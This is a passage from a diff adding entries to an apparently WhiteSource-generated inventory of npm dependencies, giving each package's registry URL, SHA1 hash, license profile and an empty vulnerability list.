"6802e6264efd18c790a1b0d517f0f2627bf2c94a", + "name": "aproba-1.2.0.tgz", + "artifactId": "aproba-1.2.0.tgz", + "version": "1.2.0", + "groupId": "aproba", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/aproba/v/1.2.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "16877fed-bbf9-4a66-8e92-8a209d57423c", + "keyId": 28586081, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-async-to-generator/-/plugin-transform-async-to-generator-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-async-to-generator" + }, + "matchType": "SHA1", + "sha1": "e2b84f11952cf5913fe3438b7d2585042772f492", + "name": "plugin-transform-async-to-generator-7.7.0.tgz", + "artifactId": "plugin-transform-async-to-generator-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-async-to-generator", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9fe1bdec-5a6b-4804-929c-78b7f9c5e959" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "015e6587-9363-4139-9c8a-ee8ee3a93475", + "keyId": 28650438, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@sentry/hub/-/hub-5.8.0.tgz", + "homePage": "https://github.com/getsentry/sentry-javascript/tree/master/packages/hub", + "genericPackageIndex": "https://www.npmjs.org/package/@sentry/hub" + }, + "matchType": "SHA1", + "sha1": "56aaeb7324cb66d90db838011cb0127f5558007f", + "name": "hub-5.8.0.tgz", + "artifactId": "hub-5.8.0.tgz", + "version": "5.8.0", + "groupId": "@sentry/hub", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ee7c1142-601f-48a0-b639-769c68fd7b92" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e27e0702-e67a-4bb4-96b2-9d60a292ca9e", + "keyId": 27842065, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/infer-owner/-/infer-owner-1.0.4.tgz", + "homePage": "https://github.com/npm/infer-owner#readme", + "genericPackageIndex": "https://www.npmjs.org/package/infer-owner" + }, + "matchType": "SHA1", + "sha1": "c4cefcaa8e51051c2a40ba2ce8a3d27295af9467", + "name": "infer-owner-1.0.4.tgz", + "artifactId": "infer-owner-1.0.4.tgz", + "version": "1.0.4", + "groupId": "infer-owner", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/infer-owner" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "09bbef9b-5463-4c42-a8d5-0652a0cc9324", + "keyId": 28586036, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.7.0.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-dotall-regex" + }, + "matchType": "SHA1", + "sha1": "c5c9ecacab3a5e0c11db6981610f0c32fd698b3b", + "name": "plugin-transform-dotall-regex-7.7.0.tgz", + "artifactId": "plugin-transform-dotall-regex-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-dotall-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5d123e84-5570-4f38-9734-20dedd47510b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ec68292a-f48b-471f-bf1f-ea967c495ca7", + "keyId": 28662250, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/node-releases/-/node-releases-1.1.40.tgz", + "homePage": "https://github.com/chicoxyzzy/node-releases#readme", + "genericPackageIndex": "https://www.npmjs.org/package/node-releases" + }, + "matchType": "SHA1", + "sha1": "a94facfa8e2d612302601ca1361741d529c4515a", + "name": "node-releases-1.1.40.tgz", + "artifactId": "node-releases-1.1.40.tgz", + "version": "1.1.40", + "groupId": "node-releases", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7333b764-14f8-4451-81b8-c11080a8dc99" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "33bffd4c-7286-40bb-bd6d-10d5cf456d8f", + "keyId": 28670268, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@sentry/node/-/node-5.9.0.tgz", + "homePage": "https://github.com/getsentry/sentry-javascript/tree/master/packages/node", + "genericPackageIndex": "https://www.npmjs.org/package/@sentry/node" + }, + "matchType": "SHA1", + "sha1": "9a8da70990e64c88a391ef86dcf29f43e0a52e59", + "name": "node-5.9.0.tgz", + "artifactId": "node-5.9.0.tgz", + "version": "5.9.0", + "groupId": "@sentry/node", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/797da65d-7e27-46bd-864c-ee94de3ae939" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "007aa64e-553b-4afc-ba22-c92fdabeab8a", + "keyId": 28586106, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-proposal-unicode-property-regex/-/plugin-proposal-unicode-property-regex-7.7.0.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-proposal-unicode-property-regex" + }, + "matchType": "SHA1", + "sha1": "549fe1717a1bd0a2a7e63163841cb37e78179d5d", + "name": "plugin-proposal-unicode-property-regex-7.7.0.tgz", + "artifactId": "plugin-proposal-unicode-property-regex-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-proposal-unicode-property-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-proposal-unicode-property-regex" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0c09f8ca-1266-4f90-9676-12d9ed65bb30", + "keyId": 26948779, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/path-is-absolute#readme", + "genericPackageIndex": "https://www.npmjs.org/package/path-is-absolute" + }, + "matchType": "SHA1", + "sha1": "174b9268735534ffbc7ace6bf53a5a9e1b5c5f5f", + "name": "path-is-absolute-1.0.1.tgz", + "artifactId": "path-is-absolute-1.0.1.tgz", + "version": "1.0.1", + "groupId": "path-is-absolute", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/path-is-absolute/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ac2b3eeb-0b36-46f4-9be2-33f094ffb7ed", + "keyId": 28624163, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@types/node/-/node-10.17.5.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@types/node" + }, + "matchType": "SHA1", + "sha1": "c1920150f7b90708a7d0f3add12a06bc9123c055", + "name": "node-10.17.5.tgz", + "artifactId": "node-10.17.5.tgz", + "version": "10.17.5", + "groupId": "@types/node", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a3e546cf-b657-4191-b689-dd99f82b7bd2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "be46d71f-e7d2-4aec-9d83-9f975fac55d4", + "keyId": 26955304, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/move-concurrently/-/move-concurrently-1.0.1.tgz", + "homePage": "https://www.npmjs.com/package/move-concurrently", + "genericPackageIndex": "https://www.npmjs.org/package/move-concurrently" + }, + "matchType": "SHA1", + "sha1": "be2c005fda32e0b29af1f05d7c4b33214c701f92", + "name": "move-concurrently-1.0.1.tgz", + "artifactId": "move-concurrently-1.0.1.tgz", + "version": "1.0.1", + "groupId": "move-concurrently", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/move-concurrently" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "80dde379-4d09-4d44-9faf-10bf115859af", + "keyId": 28607426, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-create-regexp-features-plugin/-/helper-create-regexp-features-plugin-7.7.2.tgz", + "homePage": "https://github.com/babel/babel#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-create-regexp-features-plugin" + }, + "matchType": "SHA1", + "sha1": "6f20443778c8fce2af2ff4206284afc0ced65db6", + "name": "helper-create-regexp-features-plugin-7.7.2.tgz", + "artifactId": "helper-create-regexp-features-plugin-7.7.2.tgz", + "version": "7.7.2", + "groupId": "@babel/helper-create-regexp-features-plugin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b3b43085-528f-4644-bddb-bd8aa382fcbd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "65baf791-762d-43a0-9be2-cec44a9afc3f", + "keyId": 28586052, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-function-name" + }, + "matchType": "SHA1", + "sha1": "0fa786f1eef52e3b7d4fc02e54b2129de8a04c2a", + "name": "plugin-transform-function-name-7.7.0.tgz", + "artifactId": "plugin-transform-function-name-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-function-name", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-function-name" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4e40155c-b732-4261-a288-c2b4636fb939", + "keyId": 28586108, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-optimise-call-expression" + }, + "matchType": "SHA1", + "sha1": "4f66a216116a66164135dc618c5d8b7a959f9365", + "name": "helper-optimise-call-expression-7.7.0.tgz", + "artifactId": "helper-optimise-call-expression-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-optimise-call-expression", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7acd1fb9-2303-4ed6-a176-529539cfeb4e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "433ae85f-0fb4-448c-a69b-006ba321b9a3", + "keyId": 26955180, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fs-write-stream-atomic/-/fs-write-stream-atomic-1.0.10.tgz", + "homePage": "https://github.com/npm/fs-write-stream-atomic", + "genericPackageIndex": "https://www.npmjs.org/package/fs-write-stream-atomic" + }, + "matchType": "SHA1", + "sha1": "b47df53493ef911df75731e70a9ded0189db40c9", + "name": "fs-write-stream-atomic-1.0.10.tgz", + "artifactId": "fs-write-stream-atomic-1.0.10.tgz", + "version": "1.0.10", + "groupId": "fs-write-stream-atomic", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/fs-write-stream-atomic" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "668618b5-0b9f-4ee5-bdf2-524ba6075eaa", + "keyId": 28586085, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-wrap-function/-/helper-wrap-function-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-wrap-function" + }, + "matchType": "SHA1", + "sha1": "15af3d3e98f8417a60554acbb6c14e75e0b33b74", + "name": "helper-wrap-function-7.7.0.tgz", + "artifactId": "helper-wrap-function-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-wrap-function", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0605d9c3-2e29-4f49-bcc8-f102979c8819" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "05637dd8-404e-4cdb-8d20-4d5727509762", + "keyId": 28670260, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/prettier/-/prettier-1.19.1.tgz", + "homePage": "https://prettier.io", + "genericPackageIndex": "https://www.npmjs.org/package/prettier" + }, + "matchType": "SHA1", + "sha1": "f7d7f5ff8a9cd872a7be4ca142095956a60797cb", + "name": "prettier-1.19.1.tgz", + "artifactId": "prettier-1.19.1.tgz", + "version": "1.19.1", + "groupId": "prettier", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/prettier/v/1.19.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d846e717-5eae-4316-888f-a1abdf33f854", + "keyId": 28586063, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.7.0.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-module-transforms" + }, + "matchType": "SHA1", + "sha1": "154a69f0c5b8fd4d39e49750ff7ac4faa3f36786", + "name": "helper-module-transforms-7.7.0.tgz", + "artifactId": "helper-module-transforms-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-module-transforms", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b52a6dbd-7405-4af8-8a58-984f489c93aa" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8f33b735-6d69-4303-8516-bd1bf188d35b", + "keyId": 28586065, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-replace-supers" + }, + "matchType": "SHA1", + "sha1": "d5365c8667fe7cbd13b8ddddceb9bd7f2b387512", + "name": "helper-replace-supers-7.7.0.tgz", + "artifactId": "helper-replace-supers-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-replace-supers", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e3f2d5bd-ce31-42a9-91f4-6df7e5b4985d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3ebdb4be-04fb-4654-b4bf-b7ebabe08ca0", + "keyId": 27817689, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "homePage": "https://github.com/Raynos/xtend", + "genericPackageIndex": "https://www.npmjs.org/package/xtend" + }, + "matchType": "SHA1", + "sha1": "bb72779f5fa465186b1f438f674fa347fdb5db54", + "name": "xtend-4.0.2.tgz", + "artifactId": "xtend-4.0.2.tgz", + "version": "4.0.2", + "groupId": "xtend", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/xtend" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cee4f795-42dd-4959-a5f6-0ebb0d435829", + "keyId": 26954612, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/from2/-/from2-2.3.0.tgz", + "homePage": "https://github.com/hughsk/from2", + "genericPackageIndex": "https://www.npmjs.org/package/from2" + }, + "matchType": "SHA1", + "sha1": "8bfb5502bde4a4d36cfdeea007fcca21d7e382af", + "name": "from2-2.3.0.tgz", + "artifactId": "from2-2.3.0.tgz", + "version": "2.3.0", + "groupId": "from2", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/from2/v/2.3.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "683dd78d-7c9b-4381-b749-b61068795554", + "keyId": 27023448, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz", + "homePage": "https://github.com/zkat/ssri#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ssri" + }, + "matchType": "SHA1", + "sha1": "2a3c41b28dd45b62b63676ecb74001265ae9edd8", + "name": "ssri-6.0.1.tgz", + "artifactId": "ssri-6.0.1.tgz", + "version": "6.0.1", + "groupId": "ssri", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/43cfed12-4464-4fad-b937-e233415fd3d9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "84811387-ff4c-4923-b970-22c915c9620d", + "keyId": 28586094, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-annotate-as-pure/-/helper-annotate-as-pure-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-annotate-as-pure" + }, + "matchType": "SHA1", + "sha1": "efc54032d43891fe267679e63f6860aa7dbf4a5e", + "name": "helper-annotate-as-pure-7.7.0.tgz", + "artifactId": "helper-annotate-as-pure-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-annotate-as-pure", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helper-annotate-as-pure" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7e4c34f3-c6bb-4fc0-bbfe-90789443a119", + "keyId": 28586104, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-modules-systemjs" + }, + "matchType": "SHA1", + "sha1": "9baf471213af9761c1617bb12fd278e629041417", + "name": "plugin-transform-modules-systemjs-7.7.0.tgz", + "artifactId": "plugin-transform-modules-systemjs-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-modules-systemjs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/47c9ef06-6f2e-48c6-b3d6-7a8a6507a7ca" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5ccbed95-097d-4415-8f2a-3e11deb6f69d", + "keyId": 28121892, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/zone.js/-/zone.js-0.10.2.tgz", + "homePage": "https://github.com/angular/angular#readme", + "genericPackageIndex": "https://www.npmjs.org/package/zone.js" + }, + "matchType": "SHA1", + "sha1": "67ca084b3116fc33fc40435e0d5ea40a207e392e", + "name": "zone.js-0.10.2.tgz", + "artifactId": "zone.js-0.10.2.tgz", + "version": "0.10.2", + "groupId": "zone.js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/zone.js/v/0.10.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6c757707-22b1-4631-a791-f8406424e934", + "keyId": 28486765, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-3.0.1.tgz", + "homePage": "https://github.com/TooTallNate/node-https-proxy-agent#readme", + "genericPackageIndex": "https://www.npmjs.org/package/https-proxy-agent" + }, + "matchType": "SHA1", + "sha1": "b8c286433e87602311b01c8ea34413d856a4af81", + "name": "https-proxy-agent-3.0.1.tgz", + "artifactId": "https-proxy-agent-3.0.1.tgz", + "version": "3.0.1", + "groupId": "https-proxy-agent", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/https-proxy-agent/v/3.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3b5f9d8c-525d-4f4a-a860-a2c37eff62ac", + "keyId": 28586078, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-classes/-/plugin-transform-classes-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-classes" + }, + "matchType": "SHA1", + "sha1": "b411ecc1b8822d24b81e5d184f24149136eddd4a", + "name": "plugin-transform-classes-7.7.0.tgz", + "artifactId": "plugin-transform-classes-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-classes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f4efce5b-33bc-4fc0-83a5-3d1cf2e25df6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bb004f97-6ce6-41b7-a9ed-618dd96895f3", + "keyId": 27023464, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/figgy-pudding/-/figgy-pudding-3.5.1.tgz", + "homePage": "https://github.com/zkat/figgy-pudding#readme", + "genericPackageIndex": "https://www.npmjs.org/package/figgy-pudding" + }, + "matchType": "SHA1", + "sha1": "862470112901c727a0e495a80744bd5baa1d6790", + "name": "figgy-pudding-3.5.1.tgz", + "artifactId": "figgy-pudding-3.5.1.tgz", + "version": "3.5.1", + "groupId": "figgy-pudding", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/figgy-pudding" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d5811097-1b12-4532-a0bc-9dabe97eea00", + "keyId": 26973509, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/pump/-/pump-3.0.0.tgz", + "homePage": "https://github.com/mafintosh/pump#readme", + "genericPackageIndex": 